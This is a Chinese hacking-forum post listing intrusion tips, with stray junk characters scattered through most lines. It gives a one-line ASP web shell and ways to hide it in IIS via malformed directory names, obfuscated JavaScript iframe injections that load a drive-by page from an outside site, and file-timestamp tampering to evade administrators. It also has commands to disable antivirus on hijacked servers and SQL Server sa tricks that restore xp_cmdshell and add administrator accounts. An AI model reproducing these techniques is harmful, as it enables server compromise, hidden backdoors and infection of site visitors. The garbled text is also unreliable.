1、建立非标准目录:mkdir images..\+ }6 f7 m" {9 ^" g
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* a1 p! m8 o; t: H7 J6 @6 I* k
通过web访问ASP木马:http://ip/images../news.asp?action=login
& n( W" Q. f! i1 | D, j, V1 c7 p如何删除非标准目录:rmdir images..\ /s
$ @" f3 C4 K: q7 ~2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
! a7 @* E% J: R* b# Imkdir programme.asp
+ x! B$ A, [0 _2 e# B4 m: J新建1.txt文件内容:<!--#include file=”12.jpg”-->3 D; t; B1 p0 }$ J' T; ]: A( ]
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
3 }9 m+ c4 N: V# h: s( {5 Xattrib +H +S programme.asp4 i" e5 [+ g s3 A8 o
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
+ s+ R' q+ E g3 J" b" H
- J% L6 H% U l* v7 c, a54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。7 ~5 B6 K" w, \; a: T* Z
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
9 D2 `$ d. i* w; n8 o
7 u8 K& R$ [: }( Y" J0 |) E55、JS隐蔽挂马
, Y7 }; P) m% S% k1.5 r5 n e J6 T( p. T5 w
var tr4c3="<iframe src=ht";0 C. m/ f; f V8 W9 n; K
tr4c3 = tr4c3+"tp:/";
& k l5 d2 {/ h" xtr4c3 = tr4c3+"/ww";
' u! ~+ B0 J! b5 P$ a/ V6 v' o* f" \tr4c3 = tr4c3+"w.tr4";! v; y7 R; Z" o7 M r
tr4c3 = tr4c3+"c3.com/inc/m";
+ B( [; k8 B H! btr4c3 = tr4c3+"m.htm style="display:none"></i";
5 g2 C T K o) Y: Z" Htr4c3 =tr4c3+"frame>'"; q8 a0 x+ e" v7 Z9 y" g
document.write(tr4c3);
/ s. @% O# K. K7 L2 u5 Y避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。" X! o6 ~7 K/ @0 b0 V( D! b: P/ C( S
+ Y$ r: A% ^0 u1 E+ I1 D
2.2 L; n1 I' |; _
转换进制,然后用EVAL执行。如
$ w- w, R( g: q& I2 ^eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
" _: z8 @7 n( i* ]不过这个有点显眼。- z8 m% W8 Z' M3 O" _& b3 S
3.
; K6 r# L8 J0 ^$ qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
- l! d/ b; U D* u最后一点,别忘了把文件的时间也修改下。
% {2 y2 t2 H! V2 y
# f, {9 ?! X6 ~; {" }4 V5 |" D56.3389终端入侵常用DOS命令
! ]# W- J8 S1 T3 t& v9 E' A9 Ztaskkill taskkill /PID 1248 /t9 K+ Q0 y! W3 Q$ C
6 C8 G# M, y& Z0 S# s
tasklist 查进程
/ z, b( y* m: i+ ? O9 K
, U) R p# L+ R; t! acacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
5 v- z, V% D# ^& Yiisreset /reboot# k3 e/ v& J. c+ A. [( b1 o
tsshutdn /reboot /delay:1 重起服务器+ Y' P5 B2 {# I; K0 L; R
# }' J2 p2 E! ^1 W, Q8 M) `
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
) D$ O0 ^% h; y: }
% e) p/ a5 Z. H5 mquery user 查看当前终端用户在线情况: z/ K' B+ Y. J. W6 f
( I- N3 q6 r% x7 g* ?7 s7 d
要显示有关所有会话使用的进程的信息,请键入:query process *
2 A! D1 w. s; S: j8 W l: G5 m8 I- a+ a$ z8 Z- m: V
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
. o* Z% c) d$ r8 P8 \6 U1 i
3 f! S3 X- A& D( T5 R6 g要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2- {& x6 {* z5 x0 B5 _1 W) g8 g
6 S+ H2 ^- G0 k$ I9 L0 f& @2 u/ b要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02" n/ ~9 x" P4 }6 y
" ]. M4 i9 j1 E: q) ^; k/ j6 a: Q命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启4 K- z3 k# g1 S3 C! k
$ [/ N* X( `. v; ~, m# O5 `* E+ `
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统# z5 M+ ]5 y8 Z0 E
- ^2 p. }" ? |# x5 K2 z
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。& r4 ~: x* }/ p# a" c% N
2 }9 h5 A9 m% L7 w% b+ C+ ?命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
2 C# ~2 b9 o9 | E$ P4 X; U8 g, _+ v9 H
56、在地址栏或按Ctrl+O,输入:
) V, C% C# ?3 D* Gjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;+ S4 ]7 R7 Z& Q) E
, U( |7 {7 b9 q源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。. \0 p+ a Z7 L$ B3 x7 C0 o
1 n- {) m! Y+ Z; ]/ N. r- Y k5 {- O57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
, a- k1 J& k5 o& l用net localgroup administrators是可以看到管理组下,加了$的用户的。
$ c+ O# _* Q/ {# @$ T) F# W5 s) P9 h, ~+ U
58、 sa弱口令相关命令
/ v$ P) L' J2 u! G! c
- v/ S" f+ f- `3 K一.更改sa口令方法:( J- o8 o* m8 }4 D+ Y9 o/ O
用sql综合利用工具连接后,执行命令:% ^& K# P; W% h; g' b& t8 s1 i
exec sp_password NULL,'20001001','sa'' _2 {% @9 Z* k }) L
(提示:慎用!)
: o: H8 M- y" r l. p0 L: s4 }/ f! w/ }' \9 o! b% p3 i6 l
二.简单修补sa弱口令.. T9 U. j7 J. @* n' t4 X# q
1 r/ |0 [/ \9 L
方法1:查询分离器连接后执行:
8 f; n+ j1 L. B! | N p- _) v! Fif exists (select * from& W& k* B: w$ X3 ?: k3 [+ c
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
8 V, R1 E: X6 W' m; WOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
- f2 u* d% h$ J. q- h* q7 j( g ]. n! R7 ^, G/ J
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'% O( R5 h) I2 M4 t
S A2 G8 b6 ?) I8 D* d$ z
GO. t, |& P2 d) t8 R! |* Q& I5 A
0 ^) i; j/ r0 J, e. O( h然后按F5键命令执行完毕
8 Q2 u. v, b9 h |) l
+ Q+ o2 @1 K( M! R- _7 i方法2:查询分离器连接后9 B; H! }2 f1 L, _. d# _' k
第一步执行:use master' h* w% X, Q( C5 C6 _$ u
第二步执行:sp_dropextendedproc 'xp_cmdshell'
8 a: _) v3 y( ~) c( g7 O: V- `然后按F5键命令执行完毕
4 i' \) U. w: w) c2 D9 F6 e1 X/ F
+ L; K. z( b" ?4 Q9 n8 M4 K2 v三.常见情况恢复执行xp_cmdshell.7 Q/ D" t$ ], g# X: c
P5 O# V: `3 i6 { Z8 D
) G2 D9 _% v" d j1 未能找到存储过程'master..xpcmdshell'.
/ g( ]- g% Y4 O: ]+ P5 K 恢复方法:查询分离器连接后,1 C! [( P* a8 [
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int! C: J9 d) [" q6 D7 S. H
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( Z3 W4 j5 _/ |/ W- Y* r
然后按F5键命令执行完毕
( o+ [+ H! _* l+ j5 l3 j' Z" B- f; l- ^. y4 r- U: ]
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)! Y1 i9 E" M5 ~9 ]+ D
恢复方法:查询分离器连接后,5 n" a* y& @, e
第一步执行:sp_dropextendedproc "xp_cmdshell"
% H* i! |; O7 L5 y第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4 J2 x5 [/ o7 G0 Z! W1 Q8 b* \然后按F5键命令执行完毕
& c# h+ F$ u E" k ? X2 O/ z, K& W+ E+ E) Z
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)1 T; [1 ]1 {% Y& ?
恢复方法:查询分离器连接后,
8 K) {) q$ X, P% L0 o/ i第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 W, \ _ w5 H4 K第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
, s, a. E& d% Q5 x然后按F5键命令执行完毕
! o8 J- S" v3 N1 A$ k' [! y7 V
" k0 l+ i' k$ T! C; r四.终极方法.3 T8 _5 J, B. {
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
( i+ W6 @! i! m; X/ s/ k7 Q查询分离器连接后,
0 t% d. I5 P' d- A2000servser系统:0 q: k# C$ [2 d U7 `8 c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
. w; j/ S/ H. L2 L' l: g! z0 |
. U; d% P# j2 b0 t' p9 `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
, ^1 `' y$ X) V9 Y5 a5 N0 d5 Y3 f% ^ w3 ^6 q8 R4 k
xp或2003server系统:
# H: K+ Z3 T( X# Y; r) E6 P: i) ~: d5 T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
) ]. n- J$ q0 F- P' [# v7 s, X$ I9 T, A s
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add': y* y. a) U6 G* g/ }6 T
|
发表于 2012-9-15 14:51:03
收藏
支持
反对